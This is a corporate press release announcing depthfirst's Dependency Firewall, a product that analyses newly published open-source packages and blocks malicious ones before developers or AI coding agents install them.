depthfirst today introduced Dependency Firewall, a product that reviews every open-source package being downloaded anywhere in a company and blocks the malicious ones before they reach the person or system that requested them. Developers, AI agents, and any employee using Claude, Codex, or other AI tools keep installing exactly as they do today, and nothing dangerous makes it through. Security teams can ensure that AI is rolled out safely across the company.
Modern software runs on open source, and attackers exploit that trust by publishing packages that mimic popular libraries and hide malicious code inside install scripts. The breach can happen on a first install, even before production: malicious scripts can execute the moment a package is pulled down, so a single developer machine or coding agent installing a malicious dependency can leak credentials, plant a backdoor, or exfiltrate source code before anything has been reviewed, built, or deployed.
Verizon reported that 48% of data breaches analyzed in its 2026 DBIR involved ransomware. And malware attacks have surged in recent months. They cost almost nothing to launch, and the people pulling in dependencies now include business users running AI assistants and autonomous coding agents, not only security-conscious engineers.
Dependency Firewall inspects every package being downloaded in a company, regardless of who is installing it, and returns a verdict before it is installed. Approved packages pass through with negligible latency, packages that warrant review are quarantined, and anything malicious is blocked with the supporting evidence attached. Engineers use the same install commands, CI pipelines run unchanged, and AI agents keep operating normally.
Because Dependency Firewall analyzes packages the moment they are published rather than at install time, every package has already been assessed by the time anyone requests it. The analysis runs on depthfirst’s agentic defense platform, the same system that discovered NGINX Rift, a critical 18-year-old vulnerability affecting a significant portion of global web traffic. For every new package version, it:
- Runs proprietary analysis on code and install scripts
- Performs runtime analysis to detect malicious package behavior
- Reasons about package intent and investigates unknown behavior
- Flags publisher and maintainer anomalies
- Maps dependency and transitive risk
- Checks against public and private threat and data feeds
Every verdict ships with the evidence behind it, so any decision can be audited back to the underlying signals. Beyond blocking what is clearly malicious, Dependency Firewall gives teams a programmable enforcement layer: requiring a minimum package age, restricting acceptable dependency trees, enforcing license policies across direct and transitive dependencies, and quarantining packages pending manual review. Verdicts route into the tools teams already use, and when the firewall calls something wrong, a team can override the decision in seconds, with every override logged automatically.
“We recently had an incident where an internal vibecoded app inadvertently pulled in a malicious package that put our company at risk. depthfirst’s Dependency Firewall is a game changer as it enables us to safely leverage AI across the company,” said a CISO at a Fortune 100 company.
Dependency Firewall underscores depthfirst’s vision for autonomous security from design to production. As developers, CI systems, and AI-powered workflows bring open-source software into organizations, security must begin at the moment code is introduced and continue across the full software lifecycle.
Dependency Firewall works with the infrastructure companies already have and can be deployed today. To request a demo, visit depthfirst.com.
depthfirst is dedicated to securing open source software. Through the Open Defense Initiative, it offers up to $5 million in depthfirst credits to maintainers of critical open-source projects, so they can find and fix real vulnerabilities before attackers can exploit them. The company is releasing Dependency Firewall to the participants of the Open Defense Initiative to help them prevent malware attacks.
About depthfirst
depthfirst is an applied AI lab on a mission to secure the world’s software by automating security from design to production for businesses facing modern, AI-era threats. The company’s AI-native security platform builds context on a company’s code, infrastructure, and business logic to find complex vulnerabilities, focus on the important issues, and provide developers with ready-to-merge fixes. depthfirst has raised $120M from investors including Meritech Capital, Accel, Forerunner Ventures, BoxGroup, Mantis VC, Liquid 2 Ventures, Alt Capital, SV Angel, and The House Fund. To learn more, visit depthfirst.com.
View source version on businesswire.com: https://www.businesswire.com/news/home/20260601604577/en/
Media gallery
